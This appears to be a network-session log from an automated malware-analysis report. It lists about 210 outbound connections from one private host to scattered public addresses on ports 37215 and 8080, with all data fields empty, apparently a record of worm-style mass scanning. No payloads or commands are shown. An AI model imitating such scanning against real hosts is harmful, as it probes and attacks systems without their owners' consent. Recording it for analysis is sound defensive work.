                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23288192.168.2.2350812157.113.3.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23289192.168.2.2354566161.187.139.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23290192.168.2.2352624197.154.232.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23291192.168.2.2359732157.240.13.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23292192.168.2.2333268133.127.116.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23293192.168.2.2344776157.110.93.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23294192.168.2.2350548157.56.92.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23295192.168.2.235836641.45.112.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23296192.168.2.2358772157.196.23.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23297192.168.2.2337234197.192.85.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23298192.168.2.233337441.106.143.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23299192.168.2.2356736157.194.71.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23300192.168.2.235497246.248.66.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23301192.168.2.234064641.189.85.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23302192.168.2.2354256157.34.83.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23303192.168.2.2345670197.125.247.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23304192.168.2.2349130186.182.162.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23305192.168.2.233671641.149.148.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23306192.168.2.234721241.254.24.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23307192.168.2.2353808197.162.22.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23308192.168.2.233855041.189.144.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23309192.168.2.2342890157.200.26.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23310192.168.2.2349780197.44.243.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23311192.168.2.2359956197.167.69.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23312192.168.2.2334928197.111.219.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23313192.168.2.2355600157.195.122.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23314192.168.2.233797041.21.222.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23315192.168.2.235262241.29.134.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23316192.168.2.233984238.66.243.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23317192.168.2.2356020196.239.32.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23318192.168.2.2346210130.84.94.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23319192.168.2.2346710197.65.47.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23320192.168.2.2351842157.142.126.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23321192.168.2.235144641.51.196.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23322192.168.2.2333820175.32.155.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23323192.168.2.234544441.229.118.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23324192.168.2.2355626197.199.227.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23325192.168.2.234332273.222.191.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23326192.168.2.236087241.184.194.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23327192.168.2.234956641.231.75.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23328192.168.2.233851841.104.141.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23329192.168.2.2359348197.102.161.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23330192.168.2.2343452157.106.39.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23331192.168.2.2357930157.117.49.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23332192.168.2.233489235.47.61.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23333192.168.2.233928841.105.119.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23334192.168.2.234367241.143.206.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23335192.168.2.2341494157.251.63.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23336192.168.2.2350906197.241.174.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23337192.168.2.2337934197.220.223.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23338192.168.2.2357222197.149.176.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23339192.168.2.234900441.29.102.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23340192.168.2.235377441.202.79.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23341192.168.2.2352380157.35.132.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23342192.168.2.2343616157.182.208.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23343192.168.2.236079261.156.107.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23344192.168.2.2335562150.142.86.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23345192.168.2.233705241.174.13.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23346192.168.2.2345296197.13.159.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23347192.168.2.2351846157.142.214.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23348192.168.2.2333984197.220.173.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23349192.168.2.2345780197.6.134.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23350192.168.2.234386241.63.58.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23351192.168.2.2339066157.24.45.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23352192.168.2.2339340131.220.78.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23353192.168.2.234300225.96.79.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23354192.168.2.2359142136.57.33.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23355192.168.2.2337738163.158.220.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23356192.168.2.2346462173.83.158.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23357192.168.2.234353296.238.143.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23358192.168.2.2352998183.211.228.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23359192.168.2.235384046.158.56.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23360192.168.2.233469475.29.46.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23361192.168.2.2336444120.137.52.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23362192.168.2.2343350194.103.117.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23363192.168.2.2342938109.188.53.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23364192.168.2.2343298219.241.157.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23365192.168.2.2347220212.30.183.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23366192.168.2.2343386114.29.8.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23367192.168.2.2353036152.202.236.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23368192.168.2.2343000151.111.63.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23369192.168.2.2336038102.50.245.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23370192.168.2.234176839.104.105.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23371192.168.2.2350640156.20.112.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23372192.168.2.2342672203.242.86.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23373192.168.2.235466285.64.16.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23374192.168.2.2351556177.67.210.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23375192.168.2.2345992172.51.200.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23376192.168.2.2334226219.96.33.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23377192.168.2.2338946207.167.48.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23378192.168.2.2343318149.77.143.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23379192.168.2.2357284153.120.9.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23380192.168.2.234459684.154.205.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23381192.168.2.2334674182.180.72.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23382192.168.2.2339286221.60.212.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23383192.168.2.2339038189.178.134.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23384192.168.2.2359576114.178.162.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23385192.168.2.2341114111.153.193.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23386192.168.2.236060827.233.41.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23387192.168.2.2342944142.24.189.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23388192.168.2.23569345.158.62.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23389192.168.2.2348596105.241.239.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23390192.168.2.2354934146.215.39.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23391192.168.2.2348982213.239.221.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23392192.168.2.2346014151.122.91.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23393192.168.2.2339840145.129.162.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23394192.168.2.2335194155.35.236.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23395192.168.2.2336140164.217.237.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23396192.168.2.234593620.153.88.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23397192.168.2.2336362216.118.219.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23398192.168.2.2353906210.150.111.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23399192.168.2.2339216105.108.104.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23400192.168.2.233485841.208.40.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23401192.168.2.2353110176.243.88.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23402192.168.2.2335570192.188.85.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23403192.168.2.2343808161.238.234.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23404192.168.2.235291266.200.146.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23405192.168.2.233930842.74.207.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23406192.168.2.233709672.26.233.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23407192.168.2.2342894101.100.197.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23408192.168.2.2357656191.227.55.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23409192.168.2.236035844.249.97.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23410192.168.2.233496614.76.16.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23411192.168.2.234282239.74.51.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23412192.168.2.2359316144.60.141.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23413192.168.2.234701236.60.38.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23414192.168.2.235941498.206.62.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23415192.168.2.2337740202.192.11.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23416192.168.2.2335760189.7.65.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23417192.168.2.234707247.205.45.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23418192.168.2.234941688.63.6.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23419192.168.2.233619440.123.130.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23420192.168.2.2340570210.45.255.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23421192.168.2.2339766158.218.15.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23422192.168.2.233511062.87.3.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23423192.168.2.2346622168.56.68.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23424192.168.2.2352720210.98.44.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23425192.168.2.234176093.234.131.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23426192.168.2.2334260172.177.35.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23427192.168.2.2346902121.100.241.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23428192.168.2.234655236.141.207.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23429192.168.2.236006867.46.83.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23430192.168.2.2359248164.48.92.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23431192.168.2.234374248.25.18.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23432192.168.2.234192835.8.1.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23433192.168.2.2355852152.77.82.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23434192.168.2.233779889.235.131.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23435192.168.2.234102825.248.201.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23436192.168.2.234112244.106.65.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23437192.168.2.2343952165.172.196.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23438192.168.2.2337354110.205.183.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23439192.168.2.2348456182.33.150.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23440192.168.2.234730646.109.244.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23441192.168.2.2356684196.6.54.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23442192.168.2.2360086197.198.86.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23443192.168.2.233933042.132.164.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23444192.168.2.2334054189.208.68.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23445192.168.2.2360892192.249.184.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23446192.168.2.2343396131.54.244.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23447192.168.2.2334632143.211.95.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23448192.168.2.235326665.137.191.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23449192.168.2.2356762203.179.202.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23450192.168.2.2349644148.79.0.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23451192.168.2.234640266.55.243.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23452192.168.2.2343606166.193.167.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23453192.168.2.2337080132.14.147.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23454192.168.2.2353174166.203.123.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23455192.168.2.2350356154.76.39.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23456192.168.2.235404297.250.98.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23457192.168.2.2358732220.195.129.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23458192.168.2.235615494.1.207.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23459192.168.2.234656214.62.42.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23460192.168.2.233543627.185.169.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23461192.168.2.2333698109.154.100.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23462192.168.2.2344948155.240.254.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23463192.168.2.2350132222.15.39.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23464192.168.2.2333538100.179.98.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23465192.168.2.235893689.246.121.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23466192.168.2.2334748135.158.238.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23467192.168.2.2338234220.22.122.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23468192.168.2.2335116200.240.179.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23469192.168.2.234968832.19.158.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23470192.168.2.233708292.206.198.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23471192.168.2.234142250.124.250.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23472192.168.2.235955857.102.154.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23473192.168.2.2350994149.219.139.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23474192.168.2.235216679.40.32.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23475192.168.2.2354812162.131.206.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23476192.168.2.2335942165.31.37.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23477192.168.2.2343700133.154.174.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23478192.168.2.2334786212.175.15.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23479192.168.2.234143260.195.6.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23480192.168.2.2334936106.59.103.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23481192.168.2.2351136116.151.59.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23482192.168.2.235076018.76.148.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23483192.168.2.233698480.42.173.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23484192.168.2.2347162160.193.13.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23485192.168.2.2353356112.86.204.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23486192.168.2.235002425.120.30.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23487192.168.2.235805297.215.50.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23488192.168.2.234468884.253.74.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23489192.168.2.2360628155.237.57.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23490192.168.2.2342724222.212.196.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23491192.168.2.2337282149.3.28.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23492192.168.2.2356102173.38.203.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23493192.168.2.235564058.129.100.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23494192.168.2.235723039.56.255.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23495192.168.2.2356344205.108.249.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23496192.168.2.2352024149.54.98.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23497192.168.2.233471418.237.168.1428080
                                                        TimestampBytes transferredDirectionData


